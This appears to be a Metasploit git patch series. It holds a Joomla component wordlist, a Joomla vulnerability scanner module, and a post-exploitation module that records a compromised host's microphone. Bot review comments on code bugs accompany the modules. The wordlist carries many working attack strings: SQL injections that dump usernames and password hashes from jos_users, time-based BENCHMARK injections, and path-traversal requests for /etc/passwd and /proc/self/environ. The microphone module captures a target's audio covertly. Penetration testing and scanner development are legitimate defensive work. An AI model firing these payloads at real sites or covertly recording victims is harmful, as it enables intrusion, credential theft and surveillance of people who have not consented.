+components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php +components/com_hwdvideoshare/ +components/com_hwdvideoshare/assets/uploads/flash/flash_upload.php?jqUploader=1"); +components/com_ice/ +components/com_idoblog/ +components/com_idvnews/ +components/com_ignitegallery/ +components/com_ijoomla_archive/ +components/com_ijoomla_rss/ +components/com_inter/ +components/com_ionfiles/ +components/com_is/ +components/com_ixxocart/ +components/com_jabode/ +components/com_jashowcase/ +components/com_jb2/ +components/com_jce/ +components/com_jcs/ +components/com_jd-wiki/ +components/com_jd-wp/ +components/com_jim/ +components/com_jjgallery/ +components/com_jmovies/ +components/com_jobline/ +components/com_jombib/ +components/com_joobb/ +components/com_jooget/ +components/com_joom12pic/ +components/com_joomla-visites/ +components/com_joomla_flash_uploader/ +components/com_joomlaboard/ +components/com_joomladate/ +components/com_joomlaflashfun/ +components/com_joomlalib/ +components/com_joomlaradiov5/ +components/com_joomlavvz/ +components/com_joomlaxplorer/ +components/com_joomloads/ +components/com_joomradio/ +components/com_joomtracker/ +components/com_joovideo/ +components/com_jotloader/ +components/com_journal/ +components/com_jpack/ +components/com_jpad/ +components/com_jreactions/ +components/com_jreviews/scripts/xajax.inc.php +components/com_jumi/ +components/com_juser/ +components/com_jvideo/ +components/com_k2/ +components/com_kbase/ +components/com_knowledgebase/fckeditor/fckeditor.js +components/com_kochsuite / +components/com_kunena/ +components/com_letterman/ +components/com_lexikon/ +components/com_linkdirectory/ +components/com_listoffreeads/ +components/com_livechat/getSavedChatRooms.php +components/com_livechat/xmlhttp.php +components/com_liveticker/ +components/com_lm/ +components/com_lmo/ +components/com_loudmounth/includes/abbc/abbc.class.php +components/com_loudmouth/ +components/com_lowcosthotels/ 
+components/com_lurm_constructor/admin.lurm_constructor.php +components/com_mad4joomla/ +components/com_madeira/img.php +components/com_maianmusic/ +components/com_mailarchive/ +components/com_mailto/ +components/com_mambatstaff/mambatstaff.php +components/com_mambelfish/ +components/com_mambospgm/ +components/com_mambowiki/MamboLogin.php +components/com_marketplace/ +components/com_mcquiz/ +components/com_mdigg/ +components/com_media_library/ +components/com_mediaslide/ +components/com_mezun/ +components/com_mgm/ +components/com_minibb/ +components/com_misterestate/ +components/com_mmp/help.mmp.php +components/com_model/ +components/com_moodle/moodle.php +components/com_moofaq/ +components/com_mosmedia/ +components/com_mospray/scripts/admin.php +components/com_mosres/ +components/com_most/ +components/com_mp3_allopass/ +components/com_mtree/ +components/com_mtree/img/listings/o/{id}.php +components/com_multibanners/extadminmenus.class.php +components/com_myalbum/ +components/com_mycontent/ +components/com_mydyngallery/ +components/com_mygallery/ +components/com_n-forms/ +components/com_na_content/ +components/com_na_mydocs/ +components/com_na_newsdescription/ +components/com_na_qforms/ +components/com_neogallery/ +components/com_neorecruit/ +components/com_neoreferences/ +components/com_netinvoice/ +components/com_news/ +components/com_news_portal/ +components/com_newsflash/ +components/com_nfn_addressbook/ +components/com_nicetalk/ +components/com_noticias/ +components/com_omnirealestate/ +components/com_omphotogallery/ +components/com_ongumatimesheet20/ +components/com_onlineflashquiz/ +components/com_ownbiblio/ +components/com_panoramic/ +components/com_paxgallery/ +components/com_paxxgallery/ +components/com_pcchess/ +components/com_pcchess/include.pcchess.php +components/com_pccookbook/ +components/com_pccookbook/pccookbook.php +components/com_peoplebook/param.peoplebook.php +components/com_performs/ +components/com_philaform/ 
+components/com_phocadocumentation/ +components/com_php/ +components/com_phpshop/toolbar.phpshop.html.php +components/com_pinboard/ +components/com_pms/ +components/com_poll/ +components/com_pollxt/ +components/com_ponygallery/ +components/com_portafolio/ +components/com_portfol/ +components/com_prayercenter/ +components/com_pro_desk/ +components/com_prod/ +components/com_productshowcase/ +components/com_profiler/ +components/com_projectfork/ +components/com_propertylab/ +components/com_puarcade/ +components/com_publication/ +components/com_quiz/ +components/com_rapidrecipe/ +components/com_rdautos/ +components/com_realestatemanager/ +components/com_recly/ +components/com_referenzen/ +components/com_rekry/ +components/com_remository/admin.remository.php +components/com_remository_files/file_image_14/1276100016shell.php +components/com_reporter/processor/reporter.sql.php +components/com_resman/ +components/com_restaurante/ +components/com_ricette/ +components/com_rsfiles/ +components/com_rsgallery/ +components/com_rsgallery2/ +components/com_rss/ +components/com_rssreader/ +components/com_rssxt/ +components/com_rwcards/ +components/com_school/ +components/com_search/ +components/com_sebercart/getPic.php?p=[LFD]%00 +components/com_securityimages/ +components/com_sef/ +components/com_seminar/ +components/com_serverstat/install.serverstat.php +components/com_sg/ +components/com_simple_review/ +components/com_simpleboard/ +components/com_simplefaq/ +components/com_simpleshop/ +components/com_sitemap/sitemap.xml.php +components/com_slideshow/ +components/com_smf/ +components/com_smf/smf.php +components/com_swmenupro/ +components/com_team/ +components/com_tech_article/ +components/com_thopper/ +components/com_thyme/ +components/com_tickets/ +components/com_tophotelmodule/ +components/com_tour_toto/ +components/com_trade/ +components/com_uhp/ +components/com_uhp2/ +components/com_user/controller.php +components/com_users/ 
+components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php +components/com_vehiclemanager/ +components/com_versioning / +components/com_videodb/core/videodb.class.xml.php +components/com_virtuemart/ +components/com_volunteer/ +components/com_vr/ +components/com_waticketsystem/ +components/com_webhosting/ +components/com_weblinks/ +components/com_webring/ +components/com_wmtgallery/ +components/com_wmtportfolio/ +components/com_x-shop/ +components/com_xevidmegahd/ +components/com_xewebtv/ +components/com_xfaq/ +components/com_xgallery/helpers/img.php?file= +components/com_xsstream-dm/ +components/com_ynews/ +components/com_yvcomment/ +components/com_zoom/classes/ +components/mod_letterman/ +components/remository/ +eXtplorer/ +easyblog/entry/uncategorized +extplorer/ +http://{target}/components/com_mtree/img/listings/o/{id}.php where {id} +includes/joomla.php +index.php/404' +index.php/?option=com_question&catID=21' and+1=0 union all +index.php/image-gallery/">/25-koala +index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&type=css&v=1 +index.php?option=com_aardvertiser&cat_name=Vehicles'+AND+'1'='1&task=view +index.php?option=com_aardvertiser&cat_name=conf&task=<= +index.php?option=com_aardvertiser&task= +index.php?option=com_abc&view=abc&letter=AS§ionid=' +index.php?option=com_advert&id=36' +index.php?option=com_alameda&controller=comments&task=edit&storeid=-1+union+all+select+concat_ws(0x3a,username,password)+from+jos_users-- +index.php?option=com_alfurqan15x&action=viewayat&surano= +index.php?option=com_amblog&view=amblog&catid=-1 UNION SELECT @@version +index.php?option=com_annonces&view=edit&Itemid=1 +index.php?option=com_articleman&task=new +index.php?option=com_bbs&bid=-1 +index.php?option=com_beamospetition&startpage=3&pet=- +index.php?option=com_beamospetition&startpage=3&pet=-1+Union+select+user()+from+jos_users- +index.php?option=com_bearleague&task=team&tid=8&sid=1&Itemid=%27 
+index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_biblioteca&view=biblioteca&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23 +index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=-1 +index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11+from+jos_users-- +index.php?option=com_chronoconnectivity&itemid=1 +index.php?option=com_chronocontact&itemid=1 +index.php?option=com_cinema&Itemid=S@BUN&func=detail&id= +index.php?option=com_clantools&squad=1+ +index.php?option=com_clantools&task=clanwar&showgame=1+ +index.php?option=com_commedia&format=raw&task=image&pid=4&id=964' +index.php?option=com_commedia&task=page&commpid=21 +index.php?option=com_connect&view=connect&controller= +index.php?option=com_content&view=article&id=[A VALID ID]&Itemid=[A VALID ID]&sflaction=dir&sflDir=../../../ +index.php?option=com_delicious&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_dioneformwizard&controller=[LFI]%00 +index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=-1 +index.php?option=com_dshop&controller=fpage&task=flypage&idofitem=12 +index.php?option=com_easyfaq&Itemid=1&task=view&gid= +index.php?option=com_easyfaq&catid=1&task=view&id=-2527+ +index.php?option=com_easyfaq&task=view&contact_id= +index.php?option=com_elite_experts&task=showExpertProfileDetailed&getExpertsFromCountry=&language=ru&id= +index.php?option=com_equipment&task=components&id=45&sec_men_id= +index.php?option=com_equipment&view=details&id= +index.php?option=com_estateagent&Itemid=47&act=object&task=showEO&id=[sqli] +index.php?option=com_etree&view=displays&layout=category&id=[SQL] +index.php?option=com_etree&view=displays&layout=user&user_id=[SQL] 
+index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1 +index.php?option=com_fabrik&view=table&tableid=13+union+select+1---- +index.php?option=com_filecabinet&task=download&cid[]=7 +index.php?option=com_firmy&task=section_show_set&Id=-1 +index.php?option=com_fss&view=test&prodid=777777.7'+union+all+select+77777777777777%2C77777777777777%2C77777777777777%2Cversion()%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777--+D4NB4R +index.php?option=com_golfcourseguide&view=golfcourses&cid=1&id= +index.php?option=com_graphics&controller= +index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0&data_search= +index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0?data_search=&rpp= +index.php?option=com_huruhelpdesk&view=detail +index.php?option=com_huruhelpdesk&view=detail&cid[0]= +index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1 +index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=1 +index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=2 +index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id[]=1 +index.php?option=com_iproperty&view=agentproperties&id= +index.php?option=com_jacomment&view= +index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00 +index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00 +index.php?option=com_jcommunity&controller=members&task=1' +index.php?option=com_jeajaxeventcalendar&view=alleventlist_more&event_id=-13 +index.php?option=com_jefaqpro&view=category&layout=categorylist&catid=2 +index.php?option=com_jefaqpro&view=category&layout=categorylist&task=lists&catid=2 +index.php?option=com_jeguestbook&view=../../../../../../../../etc/passwd%00 +index.php?option=com_jeguestbook&view=item_detail&d_itemid=-1 OR (SELECT(IF(0x41=0x41, BENCHMARK(999999999,NULL),NULL))) +index.php?option=com_jfuploader&Itemid= +index.php?option=com_jgen&task=view&id= 
+index.php?option=com_jgrid&controller=../../../../../../../../etc/passwd%00 +index.php?option=com_jimtawl&Itemid=12&task= +index.php?option=com_jmarket&controller=product&task=1' +index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=1' +index.php?option=com_jomdirectory&task=search&type=111+ +index.php?option=com_joomdle&view=detail&cat_id=1&course_id= +index.php?option=com_joomla_flash_uploader&Itemid=1 +index.php?option=com_joomleague&func=showNextMatch&p=[sqli] +index.php?option=com_joomleague&view=resultsmatrix&p=4&Itemid=[sqli] +index.php?option=com_joomtouch&controller= +index.php?option=com_jphone&controller../../../../../../../../../../etc/passwd%00 +index.php?option=com_jphone&controller../../../../../../../../../../proc/self/environ%00 +index.php?option=com_jscalendar&view=jscalendar&task=details&ev_id=999 UNION SELECT 1,username,password,4,5,6,7,8 FROM jos_users +index.php?option=com_jstore&controller=product-display&task=1' +index.php?option=com_jsubscription&controller=subscription&task=1' +index.php?option=com_jtickets&controller=ticket&task=1' +index.php?option=com_konsultasi&act=detail&sid= +index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en +index.php?option=com_kunena&func=userlist&search= +index.php?option=com_lead&task=display&archive=1&Itemid=65&leadstatus=1' +index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_markt&page=show_category&catid=7+union+select+0,1,password,3,4,5,username,7,8+from+jos_users-- +index.php?option=com_matamko&controller= +index.php?option=com_myhome&task=4&nidimmindex.php?option=com_myhome&task=4&nidimm +index.php?option=com_neorecruit&task=offer_view&id= +index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users-- +index.php?option=com_noticeboard&controller= 
+index.php?option=com_obsuggest&controller= +index.php?option=com_ongallery&task=ft&id=-1+order+by+1-- +index.php?option=com_ongallery&task=ft&id=-1+union+select+1-- +index.php?option=com_oziogallery&Itemid= +index.php?option=com_page&id=53 +index.php?option=com_pbbooking&task=validate&id=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(999999999,NULL),NULL))) +index.php?option=com_pcchess&controller=../../../../../../../../../../../../../etc/passwd%00 +index.php?option=com_peliculas&view=peliculas&id=null[Sql Injection] +index.php?option=com_phocagallery&view=categories&Itemid= +index.php?option=com_photomapgallery&view=imagehandler&folder=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) +index.php?option=com_php&file=../../../../../../../../../../etc/passwd +index.php?option=com_php&file=../images/phplogo.jpg +index.php?option=com_php&file=../js/ie_pngfix.js +index.php?option=com_ponygallery&Itemid=[sqli] +index.php?option=com_products&catid=-1 +index.php?option=com_products&id=-1 +index.php?option=com_products&product_id=-1 +index.php?option=com_products&task=category&catid=-1 +index.php?option=com_properties&task=agentlisting&aid= +index.php?option=com_qcontacts&Itemid=1' +index.php?option=com_qcontacts?=catid=0&filter_order=[SQLi]&filter_order_Dir=&option=com_qcontacts +index.php?option=com_record&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_restaurantguide&view=country&id='&Itemid=69 +index.php?option=com_rokmodule&tmpl=component&type=raw&module=1' +index.php?option=com_seyret&view= +index.php?option=com_simpleshop&Itemid=26&task=viewprod&id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users-- +index.php?option=com_smartsite&controller= +index.php?option=com_spa&view=spa_product&cid= +index.php?option=com_spidercalendar +index.php?option=com_spidercalendar&date=1' 
+index.php?option=com_spielothek&task=savebattle&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) +index.php?option=com_spielothek&view=battle&wtbattle=ddbdelete&dbtable=vS&loeschen[0]=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) +index.php?option=com_spielothek&view=battle&wtbattle=play&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) +index.php?option=com_staticxt&staticfile=test.php&id=1923 +index.php?option=com_szallasok&mode=8&id=25 (SQL) +index.php?option=com_tag&task=tag&tag= +index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+concat_ws(0x3a,username,password),2,3,4,5,6+from+jos_users-- +index.php?option=com_timetrack&view=timetrack&ct_id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,CONCAT(username,0x3A,password) FROM jos_users +index.php?option=com_ultimateportfolio&controller= +index.php?option=com_users&view=registration +index.php?option=com_virtuemart&page=account.index&keyword=[sqli] +index.php?option=com_worldrates&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_x-shop&action=artdetail&idd=' +index.php?option=com_x-shop&action=artdetail&idd='[SQLi] +index.php?option=com_xcomp&controller=../../[LFI]%00 +index.php?option=com_xvs&controller=../../[LFI]%00 +index.php?option=com_yellowpages&cat=-1923+UNION+SELECT 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users--+Union+select+user()+from+jos_users-- +index.php?option=com_yjcontactus&view= +index.php?option=com_youtube&id_cate=4 +index.php?option=com_zina&view=zina&Itemid=9 +index.php?option=com_zoomportfolio&view=portfolio&view=portfolio&id= +index.php?search=NoGe&option=com_esearch&searchId= +index.php?view=videos&type=member&user_id=-62+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+jos_users--&option=com_jomtube 
+index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7+from+jos_users-- +js/index.php?option=com_socialads&view=showad&Itemid=94 +libraries/joomla/utilities/compat/php50x.php +libraries/pcl/pcltar.php +libraries/phpmailer/phpmailer.php +libraries/phpxmlrpc/xmlrpcs.php +modules/mod_artuploader/upload.php"); +modules/mod_as_category.php +modules/mod_calendar.php +modules/mod_ccnewsletter/helper/popup.php?id=[SQLi] +modules/mod_dionefileuploader/upload.php?module_dir=./&module_max=2097152&file_type=application/octet-stream"); +modules/mod_jfancy/script.php"); +modules/mod_ppc_simple_spotlight/elements/upload_file.php +modules/mod_ppc_simple_spotlight/img/ +modules/mod_pxt/ +modules/mod_quick_question.php +modules/mod_visitorsgooglemap/map_data.php?action=listpoints&lastMarkerID=0 +patch/makedown.php?arquivo=../../../../etc/passwd +plugins/content/efup_files/helper.php"); +plugins/editors/idoeditor/themes/advanced/php/image.php" method="post" enctype="multipart/form-data"> +plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/ +plugins/editors/xstandard/attachmentlibrary.php +print.php?task=person&id=36 and 1=1 +templates/be2004-2/ +templates/ja_purity/ +wap/wapmain.php?option=onews&action=link&id=-154+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1-- +web/index.php?option=com_rokmodule&tmpl=component&type=raw&module=1' \ No newline at end of file diff --git a/modules/auxiliary/scanner/http/joomla_vulnscan.rb b/modules/auxiliary/scanner/http/joomla_vulnscan.rb new file mode 100755 index 000000000000..c8cbfbae27f9 --- /dev/null +++ b/modules/auxiliary/scanner/http/joomla_vulnscan.rb 
@@ -0,0 +1,270 @@ +## +# $Id: joomla_vulnscan.rb +## +## +#Thanks to @zeroSteiner @kaospunk helping with examples and questions. Also thanks to Joomscan and various MSF modules for code examples. +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + def initialize + super( + 'Name' => 'Joomla Scanner', + 'Version' => '$Revision: 14774 $', + 'Description' => %q{ + This module scans the Joomla install for information and potential vulnerabilites. + }, + 'Author' => [ 'f8lerror' ], + 'License' => MSF_LICENSE + ) + register_options( + [ + OptString.new('PATH', [ true, "The path to the Joomla install", '/']), + OptBool.new('ENUMERATE', [ false, "Enumerate Plugins", true]), + + OptPath.new('PLUGINS', [ false, "Path to list of plugins to enumerate", + File.join(Msf::Config.install_root, "data", "wordlists", "pcheck.txt") + ] + ) + + ], self.class) + end + + def osfingerprint(response) + if(response.headers.has_key?('Server') ) + if(response.headers['Server'] =~/Win32/ or response.headers['Server'] =~ /\(Windows/ or response.headers['Server'] =~ /IIS/) + os = "Windows" + elsif(response.headers['Server'] =~ /Apache\// and response.headers['Server'] !~/(Win32)/) + os = "*Nix" + else + os = "Unknown Server Header Reporting: "+response.headers['Server'] + end + end + return os + end + def fingerprint(response, app) + + if(response.body =~ /(.+)<\/version\/?>/i) + v = $1 + out = (v =~ /^6/) ? 
"Joomla #{v}" : " #{v}" + elsif(response.body =~ /system\.css 20196 2011\-01\-09 02\:40\:25Z ian/ or + response.body =~ /MooTools\.More\=\{version\:\"1\.3\.0\.1\"/ or + response.body =~ /en-GB\.ini 20196 2011\-01\-09 02\:40\:25Z ian/ or + response.body =~ /en-GB\.ini 20990 2011\-03\-18 16\:42\:30Z infograf768/ or + response.body =~/20196 2011\-01\-09 02\:40\:25Z ian/) + out = "1.6" + elsif(response.body =~ /system\.css 21322 2011\-05\-11 01\:10\:29Z dextercowley / or + response.body =~ /MooTools\.More\=\{version\:\"1\.3\.2\.1\"/ or response.body =~ /22183 2011\-09\-30 09\:04\:32Z infograf768/ or response.body =~ /21660 2011\-06\-23 13\:25\:32Z infograf768/) + out = "1.7" + elsif(response.body =~ /Joomla! 1.5/ or + response.body =~ /MooTools\=\{version\:\'1\.12\'\}/ or response.body =~ /11391 2009\-01\-04 13\:35\:50Z ian/) + out = "1.5" + elsif(response.body =~ /Copyright \(C\) 2005 \- 2012 Open Source Matters/ or + response.body =~ /MooTools.More\=\{version\:\"1\.4\.0\.1\"/ ) + out = "2.5" + elsif(response.body =~ /\s+ tpath, + 'method' => 'GET', + }, 5) + return if not bres or not bres.body or not bres.code + bres.body.gsub!(/[\r|\n]/, ' ') + File.open(datastore['PLUGINS'], 'rb').each_line do |bapp| + papp = bapp.chomp + plugin_search(tpath,papp,ip,bres) + end + end + + end + def check_app(tpath, app, ip) + res = send_request_cgi({ + 'uri' => tpath+app, + 'method' => 'GET', + }, 5) + return if not res or not res.body or not res.code + res.body.gsub!(/[\r|\n]/, ' ') + os = osfingerprint(res) + if (res.code.to_i == 200) + out = fingerprint(res,app) + return if not out + if(out =~ /Unknown Joomla/) + print_error("Unable to identify Joomla Version with this file #{app}") + return false + else + print_good("Joomla Version:#{out} from: #{app} ") + print_good("OS: #{os}") + report_note( + :host => ip, + :port => datastore['RPORT'], + :proto => 'http', + :ntype => 'Joomla Version', + :data => out + ) + return true + end + elsif(res.code.to_i == 403 and 
datastore['VERBOSE']) + if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/) + print_status("#{ip} denied access to #{url} (SSL Required)") + elsif(res.body =~ /has a list of IP addresses that are not allowed/) + print_status("#{ip} restricted access by IP") + elsif(res.body =~ /SSL client certificate is required/) + print_status("#{ip} requires a SSL client certificate") + else + print_status("#{ip} denied access to #{url} #{res.code} #{res.message}") + end + + end + rescue OpenSSL::SSL::SSLError + rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError + rescue ::Timeout::Error, ::Errno::EPIPE + end + def scan_pages(tpath,iapp, ip) + res = send_request_cgi({ + 'uri' => tpath+iapp, + 'method' => 'GET', + }, 5) + return if not res or not res.body or not res.code + res.body.gsub!(/[\r|\n]/, ' ') + if (res.code.to_i == 200) + if(res.body =~ /Administration Login/ and res.body =~ /\(\'form-login\'\)\.submit/ or res.body =~/administration console/) + sout = "Administrator Login Page" + elsif(res.body =~/Registration/ and res.body =~/class="validate">Register<\/button>/) + sout = "Registration Page" + else + sout = iapp + end + return if not sout + if(sout == iapp) + print_good("#{iapp}") + elsif print_good("#{sout}: #{iapp} ") + report_note( + :host => ip, + :port => datastore['RPORT'], + :proto => 'http', + :ntype => 'Joomla Pages', + :data => sout + ) + end + elsif(res.code.to_i == 403 and datastore['VERBOSE']) + if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/) + print_status("#{ip} denied access to #{url} (SSL Required)") + elsif(res.body =~ /has a list of IP addresses that are not allowed/) + print_status("#{ip} restricted access by IP") + elsif(res.body =~ /SSL client certificate is required/) + 
print_status("#{ip} requires a SSL client certificate") + else + print_status("#{ip} denied access to #{url} #{res.code} #{res.message}") + end + end + rescue OpenSSL::SSL::SSLError + rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError + rescue ::Timeout::Error, ::Errno::EPIPE + end + def plugin_search(tpath,papp, ip, bres) + res = send_request_cgi({ + 'uri' => tpath+papp, + 'method' => 'GET', + }, 5) + return if not res or not res.body or not res.code + res.body.gsub!(/[\r|\n]/, ' ') + osize = bres.body.size + nsize = res.body.size + if (res.code.to_i == 200 and res.body !~/#404 Component not found/ and res.body !~/

Joomla! Administration Login<\/h1>/ and osize != nsize) + print_good("Found Plugin: #{papp} ") + if (papp =~/passwd/ and res.body !~/root/) + print_error("\tPasswd not found") + elsif(papp =~/passwd/ and res.body =~/root/) + print_good("\tPasswd file found in response") + elsif(papp =~/'/ or papp =~/union/ or papp =~/sqli/ or papp =~/-\d/ and papp !~/alert/ and res.body =~/SQL syntax/) + print_good("\tPossible SQL Injection") + elsif(papp =~/'/ or papp =~/union/ or papp =~/sqli/ or papp =~/-\d/ and papp !~/alert/ and res.body !~/SQL syntax/) + print_error("\tUnable to identify SQL injection") + elsif(papp =~/>alert/ and res.body !~/>alert/) + print_error("\tNo XSS") + elsif(papp =~/>alert/ and res.body =~/>alert/) + print_good("\tPossible XSS") + elsif(res.body =~/SQL syntax/ ) + print_error("\tPossible SQL Injection") + elsif(papp =~/com_/) + blah = papp.split('_') + blah1 = blah[1].gsub('/','') + res1 = send_request_cgi({ + 'uri' => tpath+"index.php?option=com_#{blah1}", + 'method' => 'GET', + }, 5) + if (res1.code.to_i == 200) + print_status("\tFound_page: index.php?option=com_#{blah1}") + end + end + report_note( + :host => ip, + :port => datastore['RPORT'], + :proto => 'http', + :ntype => 'Plugin Found', + :data => papp + ) + elsif(res.code.to_i == 403 and datastore['VERBOSE']) + if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/) + print_status("#{ip} denied access to #{url} (SSL Required)") + elsif(res.body =~ /has a list of IP addresses that are not allowed/) + print_status("#{ip} restricted access by IP") + elsif(res.body =~ /SSL client certificate is required/) + print_status("#{ip} requires a SSL client certificate") + else + print_status("#{ip} denied access to #{url} #{res.code} #{res.message}") + end + end + + rescue OpenSSL::SSL::SSLError + rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, 
::ArgumentError + rescue ::Timeout::Error, ::Errno::EPIPE + end + + + +end From f351db3621a7af24a3f17b50c35f1e5320971237 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 17 Jan 2013 12:19:52 -0600 Subject: [PATCH 051/421] Implements the record_mic feature as a post module For easier deployment in the web GUI. Works for Windows meterpreter and Java meterpreter. --- modules/post/multi/manage/record_mic.rb | 78 +++++++++++++++++++++++++ 1 file changed, 78 insertions(+) create mode 100644 modules/post/multi/manage/record_mic.rb diff --git a/modules/post/multi/manage/record_mic.rb b/modules/post/multi/manage/record_mic.rb new file mode 100644 index 000000000000..134ad0fbeda2 --- /dev/null +++ b/modules/post/multi/manage/record_mic.rb 
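Review bot: In `plugin_search`, the follow-up response `res1` is dereferenced as `res1.code.to_i` without the nil check that every other `send_request_cgi` result in this file gets, so a timed-out request raises NoMethodError, which none of the method's `rescue` clauses catch. Guard it as `if res1 and res1.code.to_i == 200`. Separately, the 403 branches of `check_app`, `scan_pages` and `plugin_search` interpolate `#{url}`, which is not assigned anywhere in the visible methods; unless a mixin provides it, a verbose run that hits a 403 fails with NameError, and the requested path (`tpath+app`, `tpath+iapp`, `tpath+papp`) looks like what was meant. In `scan_pages`, `elsif print_good("#{sout}: #{iapp} ")` uses the print call as a condition, so `report_note` runs only if `print_good` returns a truthy value; a plain `else` followed by both calls is presumably the intent.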
@@ -0,0 +1,78 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex' + +class Metasploit3 < Msf::Post + + include Msf::Auxiliary::Report + + def initialize(info={}) + super( update_info( info, + 'Name' => 'Multi Manage Record Microphone', + 'Description' => %q{ + This module will enable and record your target's microphone. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'sinn3r'], + 'Platform' => [ 'win'], + 'SessionTypes' => [ 'meterpreter' ] + )) + + register_options( + [ + OptInt.new('DURATION', [false, 'Number of seconds to record', 5]) + ], self.class) + end + + def rhost + client.sock.peerhost + end + + def progress + timeout = (datastore['DURATION'] < 1) ? 1 : (datastore['DURATION']*0.1) + datastore['DURATION'].times do |i| + print_status("Recording: #{(Float(i+1)/datastore['DURATION'] * 100).round}% done...") + select(nil, nil, nil, timeout) + end + end + + def run + if client.nil? + print_error("Invalid session ID selected. Make sure the host isn't dead.") + return + end + + data = nil + + begin + t = framework.threads.spawn("prog", false) { progress } + data = client.webcam.record_mic(datastore['DURATION']) + rescue Rex::Post::Meterpreter::RequestError => e + print_error(e.message) + return + ensure + t.kill + end + + if data + print_status("#{rhost} - Audio size: (#{data.length.to_s} bytes)") + p = store_loot( + "#{rhost}.webcam.snapshot", + 'application/octet-stream', + rhost, + data, + "#{rhost}_audio.wav", + "#{rhost} Audio Recording" + ) + + print_good("#{rhost} - Audio recording saved: #{p}") + end + end + +end \ No newline at end of file From ff11cfe6e52a5ba005148bb1b0604072aa84b967 Mon Sep 17 00:00:00 2001 
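Review bot: The percentage printed by `progress` does not track the recording, because it loops `DURATION` times and sleeps `DURATION*0.1` seconds per iteration, so the total is 0.1 × DURATION² seconds and only matches the recording length when DURATION is 10 (the default of 5 reports 100% after 2.5 seconds). Sleeping one second per iteration, `select(nil, nil, nil, 1)`, keeps the output in step with `record_mic(datastore['DURATION'])`. In `run`, the `ensure` block calls `t.kill` even when `framework.threads.spawn` itself raised and `t` is still nil; `t.kill if t` avoids masking the original error with a NoMethodError.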
